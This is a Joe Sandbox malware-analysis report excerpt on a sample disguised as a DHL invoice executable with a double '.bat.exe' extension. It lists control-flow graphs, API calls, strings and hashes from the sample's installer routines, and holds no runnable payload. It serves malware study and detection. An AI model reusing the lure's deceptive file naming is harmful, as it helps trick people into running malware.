                                            • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 946 406647-406667 GetSystemDirectoryA 947 406669 946->947 948 40666b-40666d 946->948 947->948 949 40667d-40667f 948->949 950 40666f-406677 948->950 952 406680-4066b2 wsprintfA LoadLibraryExA 949->952 950->949 951 406679-40667b 950->951 951->952
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                            • wsprintfA.USER32 ref: 00406697
                                            • LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004066AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                            • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                            APIs
                                            • FindFirstFileA.KERNELBASE(767D3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                            • FindClose.KERNEL32(00000000), ref: 00406637
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsxA376.tmp, xrefs: 00406620
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsxA376.tmp
                                            • API String ID: 2295610775-2048479901
                                            • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                            • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                            • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                            • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 203 403e33-403e45 204 403e4b-403e51 203->204 205 403fac-403fbb 203->205 204->205 208 403e57-403e60 204->208 206 40400a-40401f 205->206 207 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 205->207 210 404021-404024 206->210 211 40405f-404064 call 404379 206->211 207->206 212 403e62-403e6f SetWindowPos 208->212 213 403e75-403e7c 208->213 215 404026-404031 call 401389 210->215 216 404057-404059 210->216 227 404069-404084 211->227 212->213 218 403ec0-403ec6 213->218 219 403e7e-403e98 ShowWindow 213->219 215->216 243 404033-404052 SendMessageA 215->243 216->211 226 4042fa 216->226 223 403ec8-403eda DestroyWindow 218->223 224 403edf-403ee2 218->224 220 403f99-403fa7 call 404394 219->220 221 403e9e-403eb1 GetWindowLongA 219->221 231 4042fc-404303 220->231 221->220 228 403eb7-403eba ShowWindow 221->228 230 4042d7-4042dd 223->230 232 403ee4-403ef0 SetWindowLongA 224->232 233 403ef5-403efb 224->233 226->231 236 404086-404088 call 40140b 227->236 237 40408d-404093 227->237 228->218 230->226 239 4042df-4042e5 230->239 232->231 233->220 242 403f01-403f10 GetDlgItem 233->242 236->237 240 4042b8-4042d1 DestroyWindow EndDialog 237->240 241 404099-4040a4 237->241 239->226 245 4042e7-4042f0 ShowWindow 239->245 240->230 241->240 246 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 241->246 247 403f12-403f29 SendMessageA IsWindowEnabled 242->247 248 403f2f-403f32 242->248 243->231 245->226 275 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 246->275 276 4040f9-4040fe 246->276 247->226 247->248 250 403f34-403f35 248->250 251 403f37-403f3a 248->251 253 403f65-403f6a call 404306 250->253 254 403f48-403f4d 251->254 255 403f3c-403f42 251->255 253->220 258 403f83-403f93 SendMessageA 254->258 260 403f4f-403f55 254->260 255->258 259 403f44-403f46 255->259 258->220 259->253 261 403f57-403f5d call 40140b 260->261 262 403f6c-403f75 call 40140b 260->262 271 403f63 261->271 262->220 272 403f77-403f81 262->272 271->253 272->271 279 404142 275->279 280 40413f-404140 275->280 276->275 281 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 279->281 280->281 282 404174-404185 SendMessageA 281->282 283 404187 281->283 284 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 282->284 283->284 284->227 295 4041cd-4041cf 284->295 295->227 296 4041d5-4041d9 295->296 297 4041f8-40420c DestroyWindow 296->297 298 4041db-4041e1 296->298 297->230 300 404212-40423f CreateDialogParamA 297->300 298->226 299 4041e7-4041ed 298->299 299->227 301 4041f3 299->301 300->230 302 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 300->302 301->226 302->226 307 40429e-4042b1 ShowWindow call 404379 302->307 309 4042b6 307->309 309->230
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                            • ShowWindow.USER32(?), ref: 00403E8F
                                            • GetWindowLongA.USER32(?,?), ref: 00403EA1
                                            • ShowWindow.USER32(?,?), ref: 00403EBA
                                            • DestroyWindow.USER32 ref: 00403ECE
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                            • GetDlgItem.USER32(?,?), ref: 00403F06
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                            • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                            • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                            • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                            • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                            • ShowWindow.USER32(00000000,?), ref: 00404108
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                            • EnableWindow.USER32(?,?), ref: 00404135
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                            • EnableMenuItem.USER32(00000000), ref: 00404152
                                            • SendMessageA.USER32(?,?,00000000,00000001), ref: 0040416A
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                            • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                            • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                            • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID:
                                            • API String ID: 121052019-0
                                            • Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                            • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                            • Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                            • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 310 403a96-403aae call 4066b5 313 403ab0-403ac0 call 4061eb 310->313 314 403ac2-403af3 call 406174 310->314 322 403b16-403b3f call 403d5b call 405d0d 313->322 318 403af5-403b06 call 406174 314->318 319 403b0b-403b11 lstrcatA 314->319 318->319 319->322 328 403b45-403b4a 322->328 329 403bc6-403bce call 405d0d 322->329 328->329 330 403b4c-403b70 call 406174 328->330 335 403bd0-403bd7 call 406320 329->335 336 403bdc-403c01 LoadImageA 329->336 330->329 339 403b72-403b74 330->339 335->336 337 403c82-403c8a call 40140b 336->337 338 403c03-403c33 RegisterClassA 336->338 353 403c94-403c9f call 403d5b 337->353 354 403c8c-403c8f 337->354 341 403d51 338->341 342 403c39-403c7d SystemParametersInfoA CreateWindowExA 338->342 344 403b85-403b91 lstrlenA 339->344 345 403b76-403b83 call 405c4a 339->345 346 403d53-403d5a 341->346 342->337 347 403b93-403ba1 lstrcmpiA 344->347 348 403bb9-403bc1 call 405c1f call 40628d 344->348 345->344 347->348 352 403ba3-403bad GetFileAttributesA 347->352 348->329 356 403bb3-403bb4 call 405c66 352->356 357 403baf-403bb1 352->357 363 403ca5-403cbf ShowWindow call 406647 353->363 364 403d28-403d29 call 4054a3 353->364 354->346 356->348 357->348 357->356 371 403cc1-403cc6 call 406647 363->371 372 403ccb-403cdd GetClassInfoA 363->372 367 403d2e-403d30 364->367 369 403d32-403d38 367->369 370 403d4a-403d4c call 40140b 367->370 369->354 375 403d3e-403d45 call 40140b 369->375 370->341 371->372 373 403cf5-403d18 DialogBoxParamA call 40140b 372->373 374 403cdf-403cef GetClassInfoA RegisterClassA 372->374 380 403d1d-403d26 call 4039e6 373->380 374->373 375->354 380->346
                                            APIs
                                              • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,?), ref: 004066C7
                                              • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                            • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,767D3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",0000000A,?), ref: 00403B11
                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,767D3410), ref: 00403B86
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                            • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",0000000A,?), ref: 00403BA4
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes), ref: 00403BED
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                            • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403C42
                                            • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                            • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",0000000A,?), ref: 00403CAD
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                            • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                            • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 1975747703-1323252269
                                            • Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                            • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                            • Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                            • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 384 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 387 402f81-402f86 384->387 388 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 384->388 390 403161-403165 387->390 396 4030a4-4030b2 call 402ecd 388->396 397 402fbf 388->397 403 4030b4-4030b7 396->403 404 403107-40310c 396->404 399 402fc4-402fdb 397->399 401 402fdd 399->401 402 402fdf-402fe8 call 40337a 399->402 401->402 410 40310e-403116 call 402ecd 402->410 411 402fee-402ff5 402->411 406 4030b9-4030d1 call 403390 call 40337a 403->406 407 4030db-403105 GlobalAlloc call 403390 call 403168 403->407 404->390 406->404 433 4030d3-4030d9 406->433 407->404 431 403118-403129 407->431 410->404 415 403071-403075 411->415 416 402ff7-40300b call 405ddb 411->416 421 403077-40307e call 402ecd 415->421 422 40307f-403085 415->422 416->422 430 40300d-403014 416->430 421->422 427 403094-40309c 422->427 428 403087-403091 call 40676c 422->428 427->399 432 4030a2 427->432 428->427 430->422 437 403016-40301d 430->437 438 403131-403136 431->438 439 40312b 431->439 432->396 433->404 433->407 437->422 440 40301f-403026 437->440 441 403137-40313d 438->441 439->438 440->422 442 403028-40302f 440->442 441->441 443 40313f-40315a SetFilePointer call 405ddb 441->443 442->422 444 403031-403051 442->444 447 40315f 443->447 444->404 446 403057-40305b 444->446 448 403063-40306b 446->448 449 40305d-403061 446->449 447->390 448->422 450 40306d-40306f 448->450 449->432 449->448 450->422
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402F42
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,00000400,?,?,00403722,?,?,?,0000000A,?), ref: 00402F5E
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?,?,?), ref: 00402FAA
                                            • GlobalAlloc.KERNELBASE(?,?,?,?,00403722,?,?,?,0000000A,?), ref: 004030E0
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
                                            • Null, xrefs: 00403028
                                            • 8TA, xrefs: 00402FBF
                                            • C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
                                            • "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe", xrefs: 00402F37
                                            • C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
                                            • Error launching installer, xrefs: 00402F81
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                            • soft, xrefs: 0040301F
                                            • Inst, xrefs: 00403016
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-695621276
                                            • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                            • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 668 406320-40632b 669 40632d-40633c 668->669 670 40633e-406353 668->670 669->670 671 406564-406568 670->671 672 406359-406364 670->672 673 406376-406380 671->673 674 40656e-406578 671->674 672->671 675 40636a-406371 672->675 673->674 678 406386-40638d 673->678 676 406583-406584 674->676 677 40657a-40657e call 40628d 674->677 675->671 677->676 680 406393-4063c9 678->680 681 406557 678->681 682 406501-406504 680->682 683 4063cf-4063d9 680->683 684 406561-406563 681->684 685 406559-40655f 681->685 686 406534-406537 682->686 687 406506-406509 682->687 688 4063f6 683->688 689 4063db-4063e4 683->689 684->671 685->671 693 406545-406555 lstrlenA 686->693 694 406539-406540 call 406320 686->694 691 406519-406525 call 40628d 687->691 692 40650b-406517 call 4061eb 687->692 690 4063fd-406405 688->690 689->688 695 4063e6-4063e9 689->695 696 406407 690->696 697 40640e-406410 690->697 705 40652a-406530 691->705 692->705 693->671 694->693 695->688 701 4063eb-4063ee 695->701 696->697 702 406412-40642d call 406174 697->702 703 406447-40644a 697->703 701->688 706 4063f0-4063f4 701->706 711 406432-406435 702->711 709 40644c-406458 GetSystemDirectoryA 703->709 710 40645d-406460 703->710 705->693 708 406532 705->708 706->690 712 4064f9-4064ff call 406587 708->712 713 4064e3-4064e6 709->713 714 406471-406474 710->714 715 406462-40646e GetWindowsDirectoryA 710->715 716 4064e8-4064ec 711->716 717 40643b-406442 call 406320 711->717 712->693 713->712 713->716 714->713 719 406476-406494 714->719 715->714 716->712 721 4064ee-4064f4 lstrcatA 716->721 717->713 723 406496-406499 719->723 724 4064ab-4064c3 call 4066b5 719->724 721->712 723->724 725 40649b-40649f 723->725 731 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 724->731 732 4064da-4064e1 724->732 729 4064a7-4064a9 725->729 729->713 729->724 731->713 731->732 732->713 732->719
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406452
                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00000000), ref: 00406468
                                            • SHGetPathFromIDListA.SHELL32(00000000,Call,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000), ref: 004064C7
                                            • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000), ref: 004064D0
                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000), ref: 004064F4
                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00000000,00424440,767D23A0), ref: 00406546
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                            • String ID: T@$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 4024019347-1387662383
                                            • Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                            • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                            • Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                            • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
